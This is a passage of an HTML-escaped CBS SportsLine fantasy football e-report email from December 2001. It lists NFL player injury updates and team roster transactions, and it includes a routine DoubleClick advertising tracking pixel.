href="http://www.sportsline.com/links/6/1/223/sffer1218v.cgi"&gt;_x000D_
 _x000D_
&lt;AREA shape="rect" coords="249, 1, 332, 25"_x000D_
href="http://www.sportsline.com/links/6/1/163/sffer1218t.cgi"&gt;_x000D_
_x000D_
&lt;AREA shape="rect" coords="332, 1, 415, 25"_x000D_
href="http://www.sportsline.com/links/6/5/3/sffer1218ftl.cgi"&gt;_x000D_
 _x000D_
&lt;/MAP&gt;_x000D_
_x000D_
&lt;/TABLE&gt;_x000D_
&lt;BR&gt;_x000D_
You are receiving these e-reports because you have signed up for_x000D_
    CBS SportsLine.com Fantasy Football.  To customize, reschedule,_x000D_
    or turn off these reports please _x000D_
    &lt;A HREF=http://football299.fantasy.sportsline.com/mp/options-ereports?league=bige01&amp;owner=67142.8&gt;click here&lt;/A&gt;&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;TABLE WIDTH=100% BORDER=0 CELLPADDING=1 CELLSPACING=0 BGCOLOR="#000099"&gt;&lt;TR&gt;&lt;TD ALIGN=left&gt;&lt;FONT FACE=arial color=ffffff SIZE=&gt;&lt;B&gt;NFL Reports,&amp;nbsp;Player Updates&amp;nbsp;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;!-- Pizzahut Presenting Logo Spotlight tag - Do not remove until 12-31-01 --&gt;_x000D_
&lt;SCRIPT language="JavaScript"&gt;_x000D_
if (!random) {if (parent.random) {var random = parent.random} else {var abc = Math.random() + ""; var random = abc.substring(2,abc.length);}}_x000D_
document.write('&lt;IMG SRC="http://ad.doubleclick.net/ad/N1549.sportsline.com/B44933.5;sz=1x1;ord=o;ord='+random+'?" WIDTH=1 HEIGHT=1 BORDER=0&gt;');_x000D_
&lt;/SCRIPT&gt;_x000D_
&lt;NOSCRIPT&gt;_x000D_
&lt;IMG SRC="http://ad.doubleclick.net/ad/N1549.sportsline.com/B44933.5;sz=1x1;ord=1?" WIDTH=1 HEIGHT=1 BORDER=0&gt;_x000D_
&lt;/NOSCRIPT&gt;_x000D_
&lt;!-- end Pizzahut Logo Spotlight tag --&gt;_x000D_
&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=4&gt;Latest NFL Player News&lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=67142.8&amp;random=792&amp;key=1329&amp;"&gt;&lt;B&gt;Shannon Sharpe&lt;/B&gt;&lt;/A&gt;, TE BAL - Free Agent &lt;FONT SIZE=1&gt;Updated 12/20/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Sharpe (leg) practiced on Wednesday. He is expected to play this week. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=67142.8&amp;random=792&amp;key=235197&amp;"&gt;&lt;B&gt;Drew Brees&lt;/B&gt;&lt;/A&gt;, QB SD - Free Agent &lt;FONT SIZE=1&gt;Updated 12/20/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;There still seems to be a chance Brees might play this week or before the season ends, says the &lt;i&gt;San Diego Union-Tribune&lt;/i&gt;_x000D_
. He has been taking snaps with the first team in practice. "I'm not going to say that he will play, (but) could he play? Yes," Mike Riley. "But I'm not going to say he will for sure. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=67142.8&amp;random=792&amp;key=235019&amp;"&gt;&lt;B&gt;Kevan Barlow&lt;/B&gt;&lt;/A&gt;, RB SF - Tori &lt;FONT SIZE=1&gt;Updated 12/20/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Despite scoring on two short TD runs last week, Barlow is not offically the Niners' goal-line back, says the &lt;i&gt;Contra-Costa Times&lt;/i&gt;. "It's a coincidence," Barlow said. "It was my turn in the rotation to be in there." The two backs will continue to split carries. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=67142.8&amp;random=792&amp;key=1290&amp;"&gt;&lt;B&gt;Terrell Owens&lt;/B&gt;&lt;/A&gt;, WR SF - Martin &lt;FONT SIZE=1&gt;Updated 12/20/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;_x000D_
&lt;FONT SIZE=2&gt;Owens (hip) did not practice on Wednesday. He is still expected to play this week. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=67142.8&amp;random=792&amp;key=146325&amp;"&gt;&lt;B&gt;Jeff Garcia&lt;/B&gt;&lt;/A&gt;, QB SF - JWillie &lt;FONT SIZE=1&gt;Updated 12/20/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Garcia (ribs) has been downgraded to questionable, but he still expects to play this week. Tim Rattay took snaps with the first team on Wednesday. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=67142.8&amp;random=792&amp;key=1785&amp;"&gt;&lt;B&gt;Ike Hilliard&lt;/B&gt;&lt;/A&gt;, WR NYG - Russell &lt;FONT SIZE=1&gt;Updated 12/20/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;The &lt;I&gt;New York Daily News&lt;/i&gt; says the pain in Hilliard's toe has worsened. He aggravated the injury in Week 14, but he is expected to play against Seattle. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;_x000D_
&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=67142.8&amp;random=792&amp;key=235234&amp;"&gt;&lt;B&gt;Santana Moss&lt;/B&gt;&lt;/A&gt;, WR NYJ - Free Agent &lt;FONT SIZE=1&gt;Updated 12/20/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Moss (quadriceps) has returned to practice. He might be able to play this week.&lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=67142.8&amp;random=792&amp;key=1069&amp;"&gt;&lt;B&gt;Steve McNair&lt;/B&gt;&lt;/A&gt;, QB TEN - Free Agent &lt;FONT SIZE=1&gt;Updated 12/20/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;McNair has missed some practice time this week because of a back injury. He is still expected to start. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=67142.8&amp;random=792&amp;key=1871&amp;"&gt;&lt;B&gt;Todd Bouman&lt;/B&gt;&lt;/A&gt;, QB MIN - Free Agent &lt;FONT SIZE=1&gt;Updated 12/20/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;_x000D_
&lt;FONT SIZE=2&gt;Bouman (thumb) missed practice on Wednesday. He is expected to play this week, although the &lt;i&gt;Minneapolis Star-Tribune&lt;/i&gt; says he might have to throw in pain. "We think he'll be practicing full speed on Thursday and Friday," Dennis Green said. "I think he'll get accustomed to how he's got to throw the ball and I think he will be effective."&lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=67142.8&amp;random=792&amp;key=146366&amp;"&gt;&lt;B&gt;Terrence Wilkins&lt;/B&gt;&lt;/A&gt;, WR IND - Free Agent &lt;FONT SIZE=1&gt;Updated 12/20/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Wilkins will sit out again this week with a hamstring injury. Reggie Wayne will be the No. 2 receiver against the Jets. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=67142.8&amp;random=792&amp;key=1288&amp;"&gt;&lt;B&gt;James McKnight&lt;/B&gt;&lt;/A&gt;, WR MIA - Free Agent &lt;FONT SIZE=1&gt;_x000D_
Updated 12/20/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;McKnight is listed as probable for this week's game with a back injury. He is expected to play against New England. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=67142.8&amp;random=792&amp;key=188491&amp;"&gt;&lt;B&gt;Larry Foster&lt;/B&gt;&lt;/A&gt;, WR DET - Free Agent &lt;FONT SIZE=1&gt;Updated 12/20/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Foster (thigh) might not be able to play this week. Bert Emanuel may take his place as Detroit's No. 2 receiver. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=67142.8&amp;random=792&amp;key=1116&amp;"&gt;&lt;B&gt;James Stewart&lt;/B&gt;&lt;/A&gt;, RB DET - Hunter &lt;FONT SIZE=1&gt;Updated 12/20/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Stewart (hip) practiced on Wednesday. He is expected to play this week. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;_x000D_
&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=67142.8&amp;random=792&amp;key=1186&amp;"&gt;&lt;B&gt;Bert Emanuel&lt;/B&gt;&lt;/A&gt;, WR DET - Free Agent &lt;FONT SIZE=1&gt;Updated 12/20/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Emanuel returned to practice on Wednesday. If his knee shows no sign of swelling, he should play this week, says the &lt;i&gt;Detroit Free Press&lt;/i&gt;. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=67142.8&amp;random=792&amp;key=187642&amp;"&gt;&lt;B&gt;Aaron Shea&lt;/B&gt;&lt;/A&gt;, TE CLE - Free Agent &lt;FONT SIZE=1&gt;Updated 12/20/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Shea did not participate in team drills on Wednesday. He is not expected to play this week, and O.J. Santiago will start in his place. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=67142.8&amp;random=792&amp;key=1025&amp;"&gt;&lt;B&gt;Scott Mitchell&lt;/B&gt;&lt;/A&gt;_x000D_
, QB CIN - Free Agent &lt;FONT SIZE=1&gt;Updated 12/20/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Mitchell strained his right rib cage on Wednesday. He is doubtful for Sunday's game, and now Kevin Thompson will back up Jon Kitna, who is expected to start although he still has a finger injury. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=67142.8&amp;random=792&amp;key=1321&amp;"&gt;&lt;B&gt;Wesley Walls&lt;/B&gt;&lt;/A&gt;, TE CAR - Free Agent &lt;FONT SIZE=1&gt;Updated 12/20/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Walls (ankle) particpated in some drills on Wednesday. He is listed as questionable, and Kris Mangum will start in Walls' place if he cannot play. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=67142.8&amp;random=792&amp;key=1203&amp;"&gt;&lt;B&gt;Muhsin Muhammad&lt;/B&gt;&lt;/A&gt;, WR CAR - Martin &lt;FONT SIZE=1&gt;Updated 12/20/01&lt;/FONT&gt;&lt;BR&gt;_x000D_
&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Muhammad (turf toe) did not practice on Wednesday. He is listed as questionable and Isaac Byrd will start if Muhammad can't play. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=67142.8&amp;random=792&amp;key=1177&amp;"&gt;&lt;B&gt;Terry Allen&lt;/B&gt;&lt;/A&gt;, RB BAL - Tori &lt;FONT SIZE=1&gt;Updated 12/20/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Allen is ready to assume a larger workload, says the &lt;i&gt;Baltimore Sun&lt;/i&gt;. He may start against the Bengals this week. "I expect to see more time but I'm still not 100 percent," Allen said. "My hand is going to bother me but I need to be out there on the field to help this team."&lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=67142.8&amp;random=792&amp;key=1035&amp;"&gt;&lt;B&gt;Elvis Grbac&lt;/B&gt;&lt;/A&gt;, QB BAL - Free Agent &lt;FONT SIZE=1&gt;Updated 12/20/01&lt;/FONT&gt;&lt;BR&gt;_x000D_
&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Don't expect to see Grbac benched this year, or anytime soon, Brian Billick told the &lt;i&gt;Baltimore Sun&lt;/i&gt;. "He's my quarterback now, he's going to be my quarterback next year, hopefully the year after that and the year after that," Billick said. "The only thing that would change that is if he chooses to retire or God forbid, he'd get a career-ending injury." &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=67142.8&amp;random=792&amp;key=1004&amp;"&gt;&lt;B&gt;Chris Chandler&lt;/B&gt;&lt;/A&gt;, QB ATL - Free Agent &lt;FONT SIZE=1&gt;Updated 12/20/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Chandler won't have too look over his shoulder this week. The &lt;i&gt;Atlanta Journal-Constitution&lt;/i&gt; says Michael Vick will not see action unless Chandler is injured. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;_x000D_
&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=67142.8&amp;random=792&amp;key=133322&amp;"&gt;&lt;B&gt;MarTay Jenkins&lt;/B&gt;&lt;/A&gt;, WR ARI - Martin &lt;FONT SIZE=1&gt;Updated 12/20/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Jenkins (ankle) did not practice on Wednesday. He is listed as questionable for Sunday's game. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=67142.8&amp;random=792&amp;key=1151&amp;"&gt;&lt;B&gt;Ricky Watters&lt;/B&gt;&lt;/A&gt;, RB SEA - Free Agent &lt;FONT SIZE=1&gt;Updated 12/19/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Watters has placed on injured reserve. He will not play again this season. Shaun Alexander will be the starter for Seattle's final three games. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=67142.8&amp;random=792&amp;key=12409&amp;"&gt;&lt;B&gt;Brian Griese&lt;/B&gt;&lt;/A&gt;, QB DEN - Matty &lt;FONT SIZE=1&gt;_x000D_
Updated 12/19/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Griese should be able to return from a concussion after the bye week. Jarious Jackson will be Denver's No. 2 QB. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=67142.8&amp;random=792&amp;key=12484&amp;"&gt;&lt;B&gt;Joe Jurevicius&lt;/B&gt;&lt;/A&gt;, WR NYG - Giggles &lt;FONT SIZE=1&gt;Updated 12/19/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Jurevicius (hamstring) is expected to return to action on Sunday. He may be able to catch a deep ball or two against the erratic Seattle secondary. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=67142.8&amp;random=792&amp;key=235216&amp;"&gt;&lt;B&gt;Travis Henry&lt;/B&gt;&lt;/A&gt;, RB BUF - Martin &lt;FONT SIZE=1&gt;Updated 12/19/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;_x000D_
Henry will miss Sunday's game with a sprained right knee. Shawn Bryson will start in his place. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=67142.8&amp;random=792&amp;key=12340&amp;"&gt;&lt;B&gt;Tim Dwight&lt;/B&gt;&lt;/A&gt;, WR SD - Free Agent &lt;FONT SIZE=1&gt;Updated 12/19/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Dwight (fluid in lung) is not expected to play this week. He has not produced very much this year when healthy.&lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=67142.8&amp;random=792&amp;key=1140&amp;"&gt;&lt;B&gt;Tyrone Wheatley&lt;/B&gt;&lt;/A&gt;, RB OAK - Giggles &lt;FONT SIZE=1&gt;Updated 12/19/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Wheatley, who was not used last week, is expected to see some playing time in Week 15. He will probably not be used enough, however, to help most Fantasy teams. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;_x000D_
&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=67142.8&amp;random=792&amp;key=1816&amp;"&gt;&lt;B&gt;Derrick Mason&lt;/B&gt;&lt;/A&gt;, WR TEN - Free Agent &lt;FONT SIZE=1&gt;Updated 12/19/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Mason missed Tuesday's practice with a hip flexor injury. His current status is day to day.&lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=67142.8&amp;random=792&amp;key=1069&amp;"&gt;&lt;B&gt;Steve McNair&lt;/B&gt;&lt;/A&gt;, QB TEN - Free Agent &lt;FONT SIZE=1&gt;Updated 12/19/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;McNair (back stiffness) missed practice on Tuesday. His current status is day to day. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=pro-player-updates&amp;league=bige01&amp;owner=67142.8&amp;random=792&amp;start=30&amp;"&gt;More Updates&lt;/A&gt;&lt;TABLE WIDTH=100% BORDER=0 CELLPADDING=1 CELLSPACING=0 BGCOLOR="#000099"&gt;&lt;TR&gt;&lt;TD ALIGN=left&gt;_x000D_
&lt;FONT FACE=arial color=ffffff SIZE=&gt;&lt;B&gt;NFL Reports,&amp;nbsp;Transactions&amp;nbsp;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;!-- Pizzahut Presenting Logo Spotlight tag - Do not remove until 12-31-01 --&gt;_x000D_
&lt;SCRIPT language="JavaScript"&gt;_x000D_
if (!random) {if (parent.random) {var random = parent.random} else {var abc = Math.random() + ""; var random = abc.substring(2,abc.length);}}_x000D_
document.write('&lt;IMG SRC="http://ad.doubleclick.net/ad/N1549.sportsline.com/B44933.5;sz=1x1;ord=o;ord='+random+'?" WIDTH=1 HEIGHT=1 BORDER=0&gt;');_x000D_
&lt;/SCRIPT&gt;_x000D_
&lt;NOSCRIPT&gt;_x000D_
&lt;IMG SRC="http://ad.doubleclick.net/ad/N1549.sportsline.com/B44933.5;sz=1x1;ord=1?" WIDTH=1 HEIGHT=1 BORDER=0&gt;_x000D_
&lt;/NOSCRIPT&gt;_x000D_
&lt;!-- end Pizzahut Logo Spotlight tag --&gt;_x000D_
&lt;TABLE BGCOLOR=#e0e6df WIDTH=100% CELLPADDING=1 CELLSPACING=0 BORDER=0&gt;&lt;TR&gt;&lt;TD ALIGN=middle&gt;&lt;FONT SIZE=2 COLOR="#000000" FACE="Arial, Helvetica"&gt;&lt;B&gt;12/20&lt;/B&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=pro-summary&amp;league=bige01&amp;owner=67142.8&amp;random=792&amp;pro_team=7&amp;"&gt;&lt;B&gt;Cincinnati Bengals&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;_x000D_
&lt;FONT SIZE=2&gt;Signed quarterback &lt;A HREF=players?league=bige01&amp;owner=67142.8&amp;key=133261&gt;Scott Covington&lt;/A&gt; to a one-year contract; placed cornerback Mark Roman on the injured reserve list. &lt;/FONT&gt;&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;TABLE BGCOLOR=#e0e6df WIDTH=100% CELLPADDING=1 CELLSPACING=0 BORDER=0&gt;&lt;TR&gt;&lt;TD ALIGN=middle&gt;&lt;FONT SIZE=2 COLOR="#000000" FACE="Arial, Helvetica"&gt;&lt;B&gt;12/19&lt;/B&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=pro-summary&amp;league=bige01&amp;owner=67142.8&amp;random=792&amp;pro_team=9&amp;"&gt;&lt;B&gt;Denver Broncos&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;_x000D_
&lt;FONT SIZE=2&gt;Placed quarterback Gus Frerote and defensive end Kavika Pittman on the injured reserve list. &lt;/FONT&gt;&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=pro-summary&amp;league=bige01&amp;owner=67142.8&amp;random=792&amp;pro_team=11&amp;"&gt;&lt;B&gt;Green Bay Packers&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;_x000D_
&lt;FONT SIZE=2&gt;Signed free safety Scott Frost; placed linebacker Chris Gizzi on injured reserve. &lt;/FONT&gt;&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;TABLE BGCOLOR=#e0e6df WIDTH=100% CELLPADDING=1 CELLSPACING=0 BORDER=0&gt;&lt;TR&gt;&lt;TD ALIGN=middle&gt;&lt;FONT SIZE=2 COLOR="#000000" FACE="Arial, Helvetica"&gt;&lt;B&gt;12/18&lt;/B&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=pro-summary&amp;league=bige01&amp;owner=67142.8&amp;random=792&amp;pro_team=7&amp;"&gt;&lt;B&gt;Cincinnati Bengals&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;_x000D_
&lt;FONT SIZE=2&gt;Placed quarterback &lt;A HREF=players?league=bige01&amp;owner=67142.8&amp;key=133415&gt;Akili Smith&lt;/A&gt; on injured reserve; signed linebacker Chris Edmonds to the active roster; signed wide receiver Khori Ivey and quarterback &lt;A HREF=players?league=bige01&amp;owner=67142.8&amp;key=192663&gt;Kevin Thompson&lt;/A&gt; to the practice squad. &lt;/FONT&gt;&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=pro-summary&amp;league=bige01&amp;owner=67142.8&amp;random=792&amp;pro_team=10&amp;"&gt;&lt;B&gt;Detroit Lions&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;_x000D_
&lt;FONT SIZE=2&gt;Waived punter Leo Araguz; signed guard Tyrone Hopson; signed tight end &lt;A HREF=players?league=bige01&amp;owner=67142.8&amp;key=192423&gt;John Waerig&lt;/A&gt; to the practice squad; placed guard Josh Lovelady on the practice squad injured reserve list. &lt;/FONT&gt;&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=pro-summary&amp;league=bige01&amp;owner=67142.8&amp;random=792&amp;pro_team=16&amp;"&gt;&lt;B&gt;Minnesota Vikings&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;_x000D_
&lt;FONT SIZE=2&gt;Placed punter Mitch Berger on injured reserve; signed quarterback &lt;A HREF=players?league=bige01&amp;owner=67142.8&amp;key=237807&gt;Romaro Miller&lt;/A&gt;. &lt;/FONT&gt;&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;TABLE BGCOLOR=#e0e6df WIDTH=100% CELLPADDING=1 CELLSPACING=0 BORDER=0&gt;&lt;TR&gt;&lt;TD ALIGN=middle&gt;&lt;FONT SIZE=2 COLOR="#000000" FACE="Arial, Helvetica"&gt;&lt;B&gt;12/17&lt;/B&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=pro-summary&amp;league=bige01&amp;owner=67142.8&amp;random=792&amp;pro_team=18&amp;"&gt;&lt;B&gt;New Orleans Saints&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;_x000D_
&lt;FONT SIZE=2&gt;Suspended wide receiver &lt;A HREF=players?league=bige01&amp;owner=67142.8&amp;key=1851&gt;Albert Connell&lt;/A&gt; for four games for conduct detrimental to the team. &lt;/FONT&gt;&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;TABLE BGCOLOR=#e0e6df WIDTH=100% CELLPADDING=1 CELLSPACING=0 BORDER=0&gt;&lt;TR&gt;&lt;TD ALIGN=middle&gt;&lt;FONT SIZE=2 COLOR="#000000" FACE="Arial, Helvetica"&gt;&lt;B&gt;12/14&lt;/B&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;B&gt;Winnipeg Blue Bombers (CFL)&lt;/B&gt;&lt;BR&gt;_x000D_
&lt;FONT SIZE=2&gt;Signed wide receiver Tyrone Sutherland. &lt;/FONT&gt;&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;B&gt;Carolina Cobras (AFL)&lt;/B&gt;&lt;BR&gt;_x000D_
&lt;FONT SIZE=2&gt;Re-signed wide receiver-defensive back Buddy Crutchfield and lineman Silas Demary; activated wide receiver-defensive back Buddy Crutchfield. &lt;/FONT&gt;&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;B&gt;Chicago Rush (AFL)&lt;/B&gt;&lt;BR&gt;_x000D_
&lt;FONT SIZE=2&gt;Signed defensive specialist Damien Marzett. &lt;/FONT&gt;&lt;BR&gt;_x000D_
